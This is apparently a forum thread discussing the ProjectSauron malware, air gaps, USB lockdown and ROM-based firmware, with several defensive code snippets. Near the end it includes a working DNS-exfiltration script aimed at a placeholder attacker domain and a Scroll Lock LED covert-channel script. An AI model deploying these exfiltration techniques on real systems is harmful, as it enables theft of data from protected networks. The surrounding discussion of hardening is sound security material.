There is also a market for routers and other devices which are produced as much as possible in the US (are they rolling their own capacitors, I wonder...). I saw some of those devices come with a 100x markup: $400 device from China vs $40k from the US. Those who sell the $40k device know how hard it is to get on the approved list, so they are milking it for all it's worth (the salesperson was quite frank about it).
It was also funny to see "Windows" as an approved, security-blessed OS while Debian, Ubuntu, and OpenBSD were rejected (with only ancient versions of RHEL approved for Linux).
And Windows 7, despite being out for something like three years, is still not certified.
And we all laughed at PS/2 keyboards and mouseeses
Basically, the device connected to the keyboard port has to reply with code 0x65 when it's initialized, then the BIOS will read some bytes into memory and jump to them. Not sure whether this was carried forward to newer models or clones, though, so it's just some fun trivia...
It's like I read that malware could infect your "internet of things" thermostat and then hackers could remotely turn off your heat until you pay ransom. Just put the dang thermostat code in ROM. Power cycle, goodbye malware.
For more critical stuff, just have it regularly power cycle itself.
Which, of course, is the whole point. If ROMs do cost more, I bet people who want secure systems would be quite willing to pay a bit extra.
It would be too expensive to put an OS in ROM, but the ROMs could contain the hashes of the OS on disk and verify the disk image before booting.
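To make that concrete, here's a minimal sketch of the idea in Python, assuming a hypothetical layout where a write-protected store holds a known-good SHA-256 of the disk image; the path and hash below are made up for illustration, and a real design would do this in boot firmware rather than a script:

    import hashlib

    # Hypothetical values for illustration only: in a real design the expected
    # hash would be burned into mask ROM or other write-protected storage.
    EXPECTED_SHA256 = "0000...replace-with-known-good-hash...0000"
    OS_IMAGE_PATH = "/boot/os.img"

    def hash_image(path, chunk_size=1 << 20):
        """Stream the disk image through SHA-256 so large images fit in memory."""
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(chunk_size), b""):
                h.update(chunk)
        return h.hexdigest()

    def verify_before_boot():
        if hash_image(OS_IMAGE_PATH) != EXPECTED_SHA256:
            raise SystemExit("OS image hash mismatch -- refusing to boot")
        print("OS image verified, handing off to the kernel")

    if __name__ == "__main__":
        verify_before_boot()

The same shape is what verified-boot schemes use, except they usually check a signature over the image so the vendor can still ship updates without reflashing the ROM.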
And besides, why would I want over-the-air updates to my freakin' thermostat?
Anyone trying to compromise the device would then require physical access.
Update buttons ain't a good replacement for TPM hardware.
For the end user, it’s extremely easy to NOT push that button.
In many cases that would probably be prohibitively expensive, but for a thermostat or a light switch, it should not be that difficult to do.
ROMs are not unfixable. They do require physical access, though, which eliminates nearly all of the risk.
Physical-access-only updates: yes please. We know what the security boundary is on those, and how to reset it.
After all, if attacks can target A, B, or C, that is no excuse to not fix B.
Not true at all.
Even if the boot device is read-only, it would be a huge challenge to build any kind of system without these vulnerable components.
There's a huge market for secure items - routers, cars, thermostats, medical devices, avionics, ATMs, etc. I simply don't understand why ROMs aren't used.
I've seen government systems running Windows (USA) and Mac (USA), but the strangest I've seen is SUSE Linux (Germany). I have no idea how they got SUSE approved when Red Hat is more "American", but some agencies don't have to follow the rules.
At least that is how I remember it.
Novell bought SUSE, then Novell merged with Attachmate; in the process SUSE became a business unit (wholly owned company?) under Attachmate, and then there was a merger between Attachmate and Micro Focus in 2014.
Anyway, I suspect that since SUSE is FOSS, and was initially Germany-based and is now UK-based, both being NATO allies, the DoD has few issues with continued usage.
From what is seen on the geopolitical landscape, Germany is a vassal state of the US.
In any real security environment, humans are poison. Period, end of story. This is not an issue exclusive to open-source.
Closed source does not mean obscurity, and open source does not mean clarity (see OpenSSL, that one Linux 2.6 thing¹, etc).
It's not like being proprietary suddenly means the only security is through obscurity. Why do you think that? Are you just a zealot? Did you not consider that closed source software could be well-engineered and secure? You're welcome to read about some of the security features in Windows NT² (that article is a bit old but still relevant), which are considerably more thorough than (non-SE)Linux (I think SELinux has auditing now, so it's at least comparable to NT).
Now, don't get me wrong, I generally prefer open-source tools (for a variety of reasons) and tend to trust them more, but saying stupid stuff like you are just gives open source a bad name.
On top of that, obscurity is a perfectly valid layer of security. To use a mediocre analogy, of course you want your safe to be strong enough that nobody could break in even if it's in plain sight—but it's certainly not a bad idea to hide the safe as well.
Is there something more subtle I'm missing?
‘Open source’ is more about the development model (and freedoms) than about the nature of ‘knowing what the software is doing’.
Heck, I could argue that Linux is a black box to most people who aren't well-versed in kernel development. OpenSSL is notoriously difficult to understand. Sometimes huge bugs look relatively innocent¹ even with people looking at the code.
¹ e.g. https://lwn.net/Articles/341773/
But reproducible builds are a hard problem, so… honestly, I can't answer that.
This seems apocryphal. It's trivial to disable USB mass storage (or all devices) via things like Group Policy or other security controls. Or disable the controller. Those USB ports aren't perfect boxes; the epoxy would just run out all over the place. More than likely you'd have an OS-level security policy and a BIOS block, which is trivial to do in a managed environment.
I hear this type of story from time to time, and frankly it's the sysadmin version of "he hacked us with a visual basic gui!"
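For reference, the usual software-side block on Windows boils down to flipping the USB storage driver's start type, which is what the standard Group Policy / management-tooling recipes do under the hood. A rough sketch using Python's winreg (assumes you're running elevated; in practice you'd push this via GPO or your management tool rather than a script):

    import winreg

    # The USB mass-storage driver's service key; Start = 4 disables it,
    # Start = 3 (load on demand) restores the default behaviour.
    KEY_PATH = r"SYSTEM\CurrentControlSet\Services\USBSTOR"

    def set_usb_storage(enabled: bool) -> None:
        value = 3 if enabled else 4
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH, 0,
                            winreg.KEY_SET_VALUE) as key:
            winreg.SetValueEx(key, "Start", 0, winreg.REG_DWORD, value)

    if __name__ == "__main__":
        set_usb_storage(enabled=False)  # block USB mass storage on this machine

Note this only blocks the storage-class driver; a malicious device presenting itself as a keyboard is untouched, which is part of why people reach for physical measures anyway.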
>$400 device from China vs $40k from US.
I'd rather trust my network with a warrantied Cisco with same-day replacement than a $400 Abibaba-sourced ROUTER PLUS SHENZEN SPECIAL with two-week delivery. I suspect you've never managed a non-trivial network before, let alone one with a real security policy, if you'd consider running that and think you're secure.
The question is - where do you stop? The controller could be re-enabled from a lower level, etc. The rabbit hole goes very deep. Sometimes it's best to just take control of the physical layer and call it a day.
> Those USB ports aren't perfect boxes, the epoxy would just run out all over the place.
Epoxy putty would work pretty well, and it's widely available.
Every motherboard is going to have that option in a slightly different place, but if you can put epoxy in one USB port you're pretty well set for any piece of hardware.
Consider another instance of the problem: verifying that your webcam isn't being used to spy on you. Since a surprising number of hardware designers were negligent and made that software-controllable, it is orders of magnitude easier to simply deploy a piece of tape than to try to prove that malware hasn't disabled the status LED.
How much skill and diligence does it take to confirm that you have disabled the controller using each manufacturer's interface (if they even have one documented), that there isn't some way to re-enable it later (or that something like a sleep/resume cycle didn't reset the controller), and that all of that continues to be true for every subsequent configuration change or software/firmware update?
I would suggest that any organization with this level of risk would be better off paying someone $15/hour to check the ports along with the rest of their physical status checks and put the security engineers in charge of other improvements with a higher return.
If you are paranoid enough or have actual reason to believe somebody would want to invade your network, epoxy is one way you can be really certain no one can hijack your network via an infected USB flash drive.
EDIT: Of course, if gluing the USB ports shut is all you do to stop attackers, you are pretty much begging for trouble. And as somebody pointed out, disconnecting the USB ports from the main board, possibly disabling the pins, is probably a better idea, as well as disabling the USB controller in firmware and locking the BIOS / setup, if it is part of a ... let's say comprehensive approach to securing your network.
If you want to stop your everyday user from plugging in USB drives, then this is probably all you need to do.
In a scenario where you're concerned about insider threats with even a minimal level of computing knowledge, you have to lock down the BIOS and the OS layer as well.
"Oh the IT guy put epoxy in the USB ports, guess I'll just take the case off and plug into the USB ports on the motherboard"
I have a friend that worked at LLNL and she used to talk about secured laptops having their USB ports epoxied and the traces physically cut on the camera and microphones to help secure them. I think even the wifi and bluetooth were disabled as well.
After hearing these stories, it made me chuckle at Zuckerberg's masking tape.
Long time ago, I've briefly managed an environment like that. It was crazy. Kids are really good at breaking stuff in creative ways.
In a managed environment you could do it via the BIOS trivially, which is most likely locked as well. I mean, gluing the ports is especially stupid. You can chip glue off with your fingers or a key. If you're doing physical things to the PC, you'd most likely just remove the USB header from the motherboard and call it a day. Pop open the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous. Ignoring the OS security policy is ridiculous. Ignoring BIOS controls is ridiculous. Ignoring how security is handled in managed environments is ridiculous.
It would take a stoned teenager two minutes to pop open the case and plug his own USB connector into the header in this scenario. Less time for a determined attacker.
I imagine some middle-manager asshole asked for a piece of plastic to block the panel to make it "look nice and remind people they're blocked", and some paper-pusher took it as "OMG THEY GLUED THE PORTS TO STOP HACKERS." He was just ignorant of how IT security is really done.
I think it's obvious HN is mostly web devs, not sysadmins or security people, if stuff like this is widely believed and comments contrary to it get instant 'disagree downvotes.' If you think the NSA and the DoD just glue ports instead of doing real security, then I don't know what to say here.
> In a managed environment you could do it via the BIOS trivially, which is most likely locked as well.
The BIOS may still not be low-level enough. There is nothing preventing a buggy xhci controller, chipset, BIOS, etc, from being exploited by a rogue USB device. It would be prudent to disable USB in the BIOS AND physically disable the ports somehow.
> Pop open the case, remove it, bend down the pins, or cut it and go about your business. Messing with stuff that takes 60 minutes to cure is ridiculous.
You do not need the epoxy to fully cure; you only need it to reach a point where the viscosity is high enough that enough of it won't drain out of the USB port when you turn the computer on its side. This can easily be under 5 minutes, depending on the type of epoxy, and you could even trivially avoid that wait time by putting a piece of tape over the epoxied port. It may also be cheaper to implement, since you can pay someone minimum wage to fill ports with epoxy, while it takes a slightly higher skill level to do work inside computer cases. It's also easier to visually verify that all USB ports are epoxied than it is to verify that all internal USB connectors have been disconnected. And consider that many motherboards have rear USB ports soldered directly onto the motherboard, which would take far more effort and skill to disconnect than it would to just fill the port with epoxy.
> It would take two minutes for a stoned teenager to pop-open the case and plug in his own USB connector into the header in this scenario. Less time for a determined attacker.
An attacker who has broken into the government building is not the person this is intended to guard against. It is intended to guard against employees accidentally inserting compromised USB devices into their computers. If the attacker is opening your computer case, they have many more options than USB ports for delivering an exploit payload. Though it's also very likely that these cases are physically locked and have case intrusion detection enabled. Not that those protections are particularly difficult to get around either. This may also help IT avoid support calls from users asking "hey, how come my USB port doesn't work?", since epoxy in the ports shows some serious intent.
Additionally, in the case of a real attacker who has physically entered the building, and intends to deliver their payload by flash drive: formerly they could just waltz by some computer, pop a drive in, and walk away. Now they'd need to at the very least open the case, which at the very least makes it take slightly longer for them to deliver their payload, and is much more likely to draw suspicion.
Anyway, you know the discussion has gone down the rathole when you're debating the relative merits of epoxy recipes for securing computers. :)
I have no reason to believe the person I worked with would make it up. There would just be no point in it.
> It's trivial to disable USB mass storage (or all devices)
Except there are hundreds of different kinds of devices, and you are tasked with quickly "doing something to fix the problem". Do you have time to go and dig through different types of BIOS menus, or open the cases of all of the machines? Or is it easier to get epoxy plungers and send an army of people from desk to desk? Normal epoxy is a pretty decent electrical insulator (some boards or components used to even be dipped in epoxy to protect them from environmental damage or tampering).
> I suspect you've never managed a non-trivial network before,
No, but I was selling a solution with one in it. And $40k was making a decent size cut in the profit margin.
That said, I could see gluing a panel over them as a visual reminder to people that those ports are off, but not as the primary blocking mechanism. More than likely it's done via security policy.
So, whether or not you believe that it is a useful solution, it certainly did happen. As for alternatives to gluing, I assume that was time related: filling in a port is certainly faster than opening thousands of machines to give them a physical port-ectomy.
Because it was more of a reminder against stupidity. "Oh look, there is glue in there; that's right, we're not supposed to stick random USB devices in there." If the machine is on their desk, yes, they could plug in a PCI device that has a USB thing on it and still connect. But by that point they are really going out of their way: they are opening the case and such, and it will be very hard to maintain the idea that it was just a stupid mistake.
It also really is not trivial to chip off most types of even general-purpose epoxy with your finger on a flat surface, let alone out of a tiny USB port your finger doesn't fit in. If the epoxy was selected with some level of care, it may be very, very time-consuming, or nearly impossible, to remove even with the right tools.
No matter what, it's a helpful measure in addition to every other way you can also disable a USB port.
If you have company critical secrets or life-safety systems, you need to air gap where possible.
That's your job. You cannot stop or prevent attacks, and if you don't have the metrics and logs, the FBI won't be able to do anything, assuming you can get them to give a shit.
So ... does anyone, perhaps who doesn't have Kaspersky's business interests to protect, care to actually speculate? In other cases it's been seemingly well-known in the security community which APT attacks trace back to which countries, it's just apparently impolite to say it in public.
Russia+Iran suggests a western actor. Their biggest shared interest is Syria, I'd think. And look, the Syrian conflict has been going on since March '11, and the activity, according to Kaspersky, reaches back to June '11. I'd say that's quite close.
Neither the US nor Europe were that deeply invested in Syria. There is, however, one small Middle East country that has quite an interest in the entire region, and also isn't friends with Iran or Russia. And it just so happens that Israel has fairly close ties with Rwanda.
None of that is in any way conclusive, but it certainly is probable.
Actually Israel is on very friendly terms with Russia. There are a ton of Russian immigrants in Israel to the point that Putin called them "Russian ambassadors".
It didn't start that way - part of the history of the creation of the modern state of Israel is Russia vs US proxy conflict (of sorts) via Egypt. But it's not like that anymore, not for a long time.
(The US and Russia have moved on to other proxies :)
Alternatively, one of the infected nations could also be responsible. Infecting selected systems inside your own borders could be a way to deflect attention when the hunt for the malware's authors begins.
Pure speculation on my part, and nothing particularly new.
Not suggesting anything, just keep that in mind.
This likely means the USA, a US ally like Israel, or a growing power such as China or India.
But the USA is the most likely candidate.
But in our current security environment, what if these walls become necessary for secure computing? By analogy, there's a reason that many ancient cities were circled by a wall.
Walls around cities were likely very poor at stopping small, stealthy groups of infiltrators. They were designed for much more brute force attacks. Apple's walled garden helps quite a bit with the deluge of crap that would be available without it. Without it there would be an order of magnitude more crap (in quantity and quality). That said, there's a vibrant black market for people that can't stand the oppressive policies of Apple.
Additionally, once you have a wall in place, it's easy to make a decision to tax certain types of traffic through it because the capability is now there, whether or not it's in the best economic interest of the people inside. Apple didn't skimp on this area. The wall was erected with tithes and taxation in mind, and collection booths at all the gates.
So, does it help? Well, it prevents roving bands of bandits from riding in, terrorizing and robbing the people unlucky enough to be in their path, and making a hasty exit, so yes, but if you're a tasty enough target, getting past the wall isn't really a problem. There are myriad ways to do that as long as you're careful. For example, the numerous secret tunnels through the wall. They aren't large, and they are constantly being filled in by the city engineers, but there's always some they haven't found if you are willing to ask the right people (or dig your own).
Okay, I believe I've tortured this analogy enough...
In a world where all phones are loosely controlled Android derivatives competing on slim profit margins, is anyone going to make the push for hard hardware-enabled crypto? And even if they wanted to, could they afford it?
Sure. I wasn't making a case that taxation at the wall is bad, but that it has the capability to be bad. We use regulation in (mostly) free markets to greater or lesser success to steer the markets in some manner. If you accept that pure capitalism doesn't necessarily yield an optimally performing system when people are involved, then that ability to influence the market is a useful capability, especially when applied judiciously. A blanket rate isn't necessarily the most efficient form of that, but it is a way to raise revenue.
> In a world where all phones are loosely controlled Android derivatives
I think you've already stacked the starting conditions to the point where it's not really worthwhile to consider. That situation would be ripe for disruption in some manner, because I think it's inherently unstable. All it takes is a small niche market for alternatives that do make choices based on privacy or security, plus events that spur interest in those topics, and the larger population of providers will need to respond appropriately or risk ceding an increasingly large portion of the market to those that do.
As you note, not sure a unipolar outcome would ever be stable enough to have persisted, but I wouldn't have expected a bipolar arrangement either. And I can imagine a market structure that would have depressed manufacturer profits far enough so as to preclude serious R&D / innovation on their parts.
I swear to God I'd put adblock on that laptop to reduce this risk. Not to mention there must have been multiple click-throughs for the different hurdles to install the malware. This is not a problem I envisage happening on Mum's iPad though, and there's a lot to be said for that peace of mind.
For all of their known (and probable) capabilities, our three-letter agencies don't seem too concerned about encouraging defensive technologies and securing domestic networks.
I'm not personally worried about what Chinese and Russian hackers know about me, because none of that information is particularly useful for taking valuables from me. I am curious what your experience is, just so I can understand the context of your concern.
Also at personal risk is anyone with a US security clearance:
...because I just described how Debian worked for the last 20 years.
The reason I ask is because there's actually value in spreading the rumor that a capability like this exists. Imagine if your adversary believed that you could gain access to their computers even when they're not connected to the internet. They'd run themselves in circles trying to secure everything!
In general, I believe this article to be true, but would love to learn more of the details.
>What would ProjectSauron have cost to set up and run?
>Kaspersky Lab has no exact data on this, but estimates that the development and operation of ProjectSauron is likely to have required several specialist teams and a budget probably running into millions of dollars.
Simply put, the goals and the methods of commercial malware are fundamentally different from those that can be recognized in state-sponsored malware.
Have a google around for Stuxnet; a fairly advanced piece of malware which went after Iranian nuclear enrichment centrifuges. It used five previously unreported Microsoft vulnerabilities and a bunch of fairly advanced techniques including jumping airgaps like ProjectSauron does via USB.
There are samples of Stuxnet kicking about, if you want to take a look yourself there's nothing stopping you. Although, you may be there a while.
Obviously that's a tremendous pain to work with, because you're limited to PS/2 keyboards and mice (etc etc), but given that there's no way of authenticating USB devices and they've already been used in various attacks, a serious airgap protocol has to ban USB ports.
You could quite easily hide a USB mass storage device inside a mouse, or with a bit more work have an unmodified mouse with a spare Flash area used for data exfiltration.
(Firewire is even worse, and Thunderbolt lets you onto the PCI bus)
This is slightly too strong – it should be “has to ban unsecured USB ports”. By 2002 or so, people I met who worked at SPAWAR were advising conference attendees to follow their standard practice of epoxying necessary USB devices to the computer and completely filling unused ports. That moved USB into the same difficulty class as other physical access attacks, which they were already depending on building security to restrict.
Also note that while it's true that Firewire and Thunderbolt are definitely still riskier, newer versions of Windows, OS X, and Linux can use the IO-MMU to prevent DMA attacks. That started shipping in OS X 10.7 and Windows 8.1 (only when locked), and OS X 10.8 enables it all of the time for hardware made around 2012 and later.
In fact, all of this would work equally well with a PS/2 port.
AFAIK one could mitigate something like this with really restrictive udev rules that only allow certain USB drivers on certain USB ports (e.g. no USB mass storage on the port dedicated to the keyboard).
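Along the same lines, the kernel also exposes per-device authorization in sysfs, so you can default-deny new USB devices and only authorize a known device on a known port. A rough Python sketch assuming root; the port path and vendor/product IDs in the allowlist are made-up examples, and a production setup would express this as udev rules (or use usbguard) rather than a one-shot script:

    import glob
    import os

    # Made-up allowlist for illustration: (port path, idVendor, idProduct)
    # of the one keyboard we expect. Everything else stays de-authorized.
    ALLOWED = {("1-1.2", "046d", "c31c")}

    def read(path):
        with open(path) as f:
            return f.read().strip()

    def default_deny():
        # Newly plugged devices on every root hub start out unauthorized.
        for f in glob.glob("/sys/bus/usb/devices/usb*/authorized_default"):
            with open(f, "w") as fh:
                fh.write("0")

    def authorize_allowlisted():
        for dev in glob.glob("/sys/bus/usb/devices/[0-9]*-*"):
            vid = os.path.join(dev, "idVendor")
            pid = os.path.join(dev, "idProduct")
            if not (os.path.exists(vid) and os.path.exists(pid)):
                continue  # skip interface entries, which lack these attributes
            entry = (os.path.basename(dev), read(vid), read(pid))
            with open(os.path.join(dev, "authorized"), "w") as fh:
                fh.write("1" if entry in ALLOWED else "0")

    if __name__ == "__main__":
        default_deny()
        authorize_allowlisted()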
If they're serious enough about finding 0-days and exploits in USB or the OS to load this shit, any physical access to the box itself is off limits.
Consider what someone with the time, skill, and access to do that could also do without that: opening the case and directly installing some sort of device, planting a camera which records you typing passwords in (“oops, left my cellphone sitting out. Won't happen again!”), planting a radio receiver which opens up all sorts of side channel attacks, installing a passive network tap, etc.
A guard with a metal detector and strict limits on what you can bring into the building or what tools you can use inside is going to do a better job preventing all of those.
If a userland program can get at the raw HID interface, that can also be used for exfiltration to a tailored device.
xset led named 'Scroll Lock'
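To illustrate how little it takes, here's a toy sketch that clocks bits out through the Scroll Lock LED using that xset command; the bit period and framing are arbitrary, and the "tailored device" on the receiving end (a doctored keyboard sampling its own LED line) is left to the imagination:

    import subprocess
    import time

    BIT_PERIOD = 0.2  # seconds per bit; real use would need agreed framing

    def set_scroll_lock(on: bool) -> None:
        # xset can drive the LED directly: 'led' turns it on, '-led' turns it off.
        subprocess.run(["xset", "led" if on else "-led", "named", "Scroll Lock"],
                       check=True)

    def send(data: bytes) -> None:
        for byte in data:
            for i in range(8):  # least significant bit first
                set_scroll_lock(bool((byte >> i) & 1))
                time.sleep(BIT_PERIOD)
        set_scroll_lock(False)

    if __name__ == "__main__":
        send(b"hi")  # 16 bits, a few seconds of blinking at this rate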
What's left? Optical media? Or are we seriously reduced to a human with two computers reading from one and typing into the other?
"The library was masquerading as a Windows password filter, which is something administrators typically use to ensure passwords match specific requirements for length and complexity. The module started every time a network or local user logged in or changed a password, and it was able to view passcodes in plaintext."
What really scares me are things that can live in firmware; not just on mass storage drives but also in host system firmware. We've let too many dragons breed in dark places in the name of Digital Restrictions Management.
Part of what makes ProjectSauron so impressive is its ability to collect data from air-gapped computers. To do this, it uses specially prepared USB storage drives that have a virtual file system that isn't viewable by the Windows operating system. To infected computers, the removable drives appear to be approved devices, but behind the scenes are several hundred megabytes reserved for storing data that is kept on the air-gapped machines. The arrangement works even against computers in which data-loss prevention software blocks the use of unknown USB drives.
Second, making partitions that Windows doesn't see is trivially easy. I went out of my way to buy a 128GB flash drive nearly 10 years ago at great expense; it had a 4GB FAT32 partition, which is what Windows would see.
It had a 16GB Linux partition, with 8GB of that being an encrypted partition.
I installed a bootloader that allowed it to be booted from if it was plugged in when any computer was starting up.
The other 100GB, you ask? Another partition...
Are we talking "partitions Windows won't mount because they aren't FAT/NTFS" or "partitions that literally do not show up in Windows Disk Management because the disk itself is reporting a different capacity, e.g. a 16GB USB drive reporting only 8GB, regardless of the OS installed"?
Like one of these, only malicious
Hidden WiFi to create a mesh network, or using ultrasound, seems doable.
> Kaspersky researchers still aren't sure precisely how the USB-enabled exfiltration works. The presence of the invisible storage area doesn't in itself allow attackers to seize control of air-gapped computers. The researchers suspect the capability is used only in rare cases and requires use of a zero-day exploit that has yet to be discovered. In all, Project Sauron is made up of at least 50 modules that can be mixed and matched to suit the objectives of each individual infection.
You remarkably have the exact exfil method when that's not disclosed information?
> Data exfiltration and real-time status reporting using DNS requests.
Sorry, to be more specific: we spoke about DNS-based exfil using base64-encoded strings in DNS lookups, and also about how to use DNS records to control botnets.
So not exact and only part of their method.
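For anyone wondering what "encoded strings in DNS lookups" looks like in practice, here's a toy sketch. It uses base32 rather than base64 because DNS names are case-insensitive; exfil.example.com is a placeholder for a domain whose authoritative nameserver the attacker controls and logs queries against:

    import base64
    import socket

    EXFIL_DOMAIN = "exfil.example.com"  # placeholder: attacker-controlled zone
    MAX_LABEL = 63  # DNS limits a single label to 63 characters

    def exfiltrate(data: bytes) -> None:
        # Base32 keeps the payload alphanumeric and survives DNS case folding.
        encoded = base64.b32encode(data).decode().rstrip("=")
        chunks = [encoded[i:i + MAX_LABEL]
                  for i in range(0, len(encoded), MAX_LABEL)]
        for seq, chunk in enumerate(chunks):
            qname = f"{seq}.{chunk}.{EXFIL_DOMAIN}"
            try:
                socket.gethostbyname(qname)  # the query itself carries the data
            except socket.gaierror:
                pass  # NXDOMAIN is fine; the lookup already reached the NS logs

    if __name__ == "__main__":
        exfiltrate(b"secret document contents")

Spotting something like this means logging and baselining recursive resolver traffic, since the individual queries look superficially legitimate.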
Due to how the industry works, they're usually correct.
At least in the US, publicly traded tech companies are accountable to shareholders: There's some transparency in the accounting, and it's hard for them to throw millions of dollars at a problem before shareholders start asking tough questions.
It says that the CD, containing data about a recent research expedition, was mailed to an academic. It was apparently intercepted in the mail, compromised, and forwarded on.
Also, this thing was running as a local admin on a domain controller. So either the DCs weren't patched or some zero-days were used. Or perhaps it was an inside job.
As I understand it, airgapped systems are not in the habit of bringing software updates across the airgap, so unpatched everything is likely.
If the WSUS server were also air-gapped, then you're in the business of manually downloading each update, verifying it, and copying it over to the air-gapped WSUS server offline.
Microsoft's Windows Update servers have also been compromised in the past. Depending on the level of security you're operating at, taking new windows updates on your air-gapped systems may require having someone decompile and review each update.
In general, being air-gapped prevents infinitely more exploits than Windows updates could ever possibly cure; that is, until one of your admins uses his admin privileges to disable the USB port restrictions for 5 minutes that one time, to copy that one file quickly so he can go home for the day. For this, there are epoxied USB ports.
To nitpick, domain controllers don't have local accounts at all. It was probably running as SYSTEM which equates to the domain controller's computer account for AD.
If I wanted to own a machine and not be detected, that's where I'd live. It's also complex and closed source so you are basically guaranteed to have exploitable bugs that won't be fixed. It has access to network and system busses at a layer below the OS so ex-filtrating can be done at a layer below what the OS can see.
For a project this big & complex, and for something that cost hundreds of millions of dollars to develop, 5 years is paltry. Duqu remained hidden for 11+ years.
It doesn't seem as though this has been especially effective with regards to information security, however. There are just too many adversaries, it's too hard to project force against them, and there's not much of an effective deterrent effect by sitting on a 'stockpile' of vulnerabilities yourself.
But IMO the disconnect is almost a fundamental one, because it's an area where what has worked fairly well for the US for 60+ years is suddenly falling flat.
One good example from recent times of how well this type of "incentive" works is Google and Stagefright. The media went nuts over Stagefright affecting virtually all Android devices - and for good reason, too.
Since then Google seems to be taking Android security way more seriously, and there have been a lot of serious security improvements in Android (7.0) over the past year.
But these sort of actions seem to happen in slow motion, if at all, when there isn't a hacking/malware catastrophe for which the companies can get blamed in the press.
The NSA pushed hard for new surveillance laws such as CISA with the promise that it's what they need to keep us safe against cyberattacks. So why isn't every single media entity blaming the NSA over every major new data breach that happened since then?
At this point I'd argue Google's security bounties have done more to secure the industry.
NIST seems like a good agency trying to do the right things. It's just that they're forced to work with bad actors.
In terms of the "narrow scope" assertion: http://csrc.nist.gov/publications/PubsSPs.html
"Department of Defence" is so PC, things were much more honest back when it it was called the "Department of War"
If you want regulation, that's Congress and POTUS, not the NSA.
We honestly don't know. It might not even be the NSA.
Why is advanced technology automatically assumed to have the backing of nation-states? Can't several highly motivated and smart individuals create the technology without a nation-state behind them?
You need to look at things like the complexity of the malware, how many staff it would take to develop and maintain it operationally, the targets selected and what sort of payloads are executed.
Criminals tend to have simpler malware that uses known exploits or a small number of zero-days.
They generally cast a wide net for their targets, and their payloads typically aim to directly raise funds (ransom, mining, card theft, etc.).
In contrast, nation-states tend to have complex malware with multiple zero days, greater care is taken to avoid detection, their targets are chosen carefully and their payloads focus on gathering information and specialized operations.
A more cynical view would be that many security firms sell both security and forensics/surveillance. One of those two product lines has to be fundamentally defective.
Is the position that hackable endpoints are a good compromise supportable any longer? Or has it bitten US entities in the ass enough that making truly secure computing a reality for computer users, even if it blinds the surveillance state, becomes the new goal.
1. endpoints are vulnerable because they are exceptionally hard to secure,
2. and attacking endpoints can be targeted and specific,
the government's case that weakening encryption is necessary for warranted search is weak. Even with strong encryption, the government can exploit the targeted communicant's endpoint to learn either the plaintext or the encryption keys. This isn't a compromise so much as a statement of reality, and of what is likely to remain reality for some time to come. Weakening encryption, for the most part, provides benefits to the government in the form of mass surveillance, but for a variety of reasons doesn't offer much benefit in the form of limited, specific searches.
>making truly secure computing a reality for computer users,
We can make endpoints more secure, but I see no path to endpoint security that will keep out a determined well resourced adversary.
Feels more like political sabre-rattling to get the public to eventually condone a future attack from our homeland shores of Oceania against the evil Eastasia or Eurasia.
Compare the mass of malware that is out there with the level of technical sophistication, the OPSEC to prevent detection, and the precise targeting of its victims here. Along with other big-name malware (e.g. Stuxnet, Flame), this class of malware is very precise in its objective. It isn't trying to make money for its owners. It isn't trying to replicate itself across the internet endlessly. Rather, it has a key objective of infecting a specific set of networks. So when researchers call out the fact that it is likely to be "state sponsored", they are saying the purpose of the malware is very different from your average piece of malware.
For example, suppose that this exploit involved the reversal of an MD5 hash (and this is simply an example, I'm not saying that the actual exploit did). How much computing power would be required to do this? I couldn't do this reliably on my home machine, nor could I afford the cloud-compute power to perform it. However, assembling a vast array of machines is within reach of a state sponsored intelligence agency.
So, that's often it: at some point, the computation would be so expensive that you'd have to infer that only a nation state could have financed it.
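A back-of-envelope version of that reasoning, with every number an illustrative assumption rather than a measurement of the actual exploit:

    # Rough, illustrative arithmetic only: how long an exhaustive search takes
    # at a given hash rate. None of these figures describe the real exploit.
    SECONDS_PER_YEAR = 365 * 24 * 3600

    def years_to_search(keyspace_bits: int, hashes_per_second: float) -> float:
        return (2 ** keyspace_bits) / hashes_per_second / SECONDS_PER_YEAR

    # Assumed rates: ~1e10 H/s for a single GPU box, ~1e14 H/s for a large cluster.
    for bits in (64, 80, 128):
        for rate in (1e10, 1e14):
            print(f"{bits}-bit keyspace at {rate:.0e} H/s: "
                  f"{years_to_search(bits, rate):.1e} years")

The point isn't the exact numbers; it's that each extra ~10 bits multiplies the cost by roughly a thousand, so the pool of feasible attackers shrinks very quickly from hobbyists to well-funded organizations.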
Yes, it is possible.
Interested to see what hosting company in the US they used.
Bribes always help.
It looks like this is probably referring to EAL.
In a market with a large number of vendors interacting with a large number of relatively unknowledgeable buyers, an oversight team is going to try to find a certification to give guidance (and ass covering).
Yes, this is a barrier to entry, but it's also a learned behaviour as buyers get repeatedly burned.
I would argue that this is equivalent to requiring your plumbers and electricians to be licensed.